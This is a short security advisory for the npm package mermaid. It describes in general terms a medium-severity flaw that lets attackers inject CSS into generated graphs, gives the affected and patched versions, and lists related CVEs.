Possible inject arbitrary `CSS` into the generated graph affecting the container HTML
- Severity:
- Medium
Description
An attacker is able to inject arbitrary CSS into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors.
Recommendation
Update the mermaid package to the latest compatible version. Followings are version details:
- Affected version(s): >= 8.0.0, < 9.1.2
- Patched version(s): 9.1.2
References
Related Issues
- jsondiffpatch is vulnerable to Cross-site Scripting (XSS) via HtmlFormatter::nodeBegin - CVE-2025-9910
- Mermaid improperly sanitizes sequence diagram labels leading to XSS - CVE-2025-54881
- Mermaid does not properly sanitize architecture diagram iconText leading to XSS - CVE-2025-54880
- Astro allows unauthorized third-party images in _image endpoint (GHSA-xf8x-j4p2-f749) - CVE-2025-55303
- Tags:
- npm
- mermaid
Anything's wrong? Let us know Last updated on July 21, 2023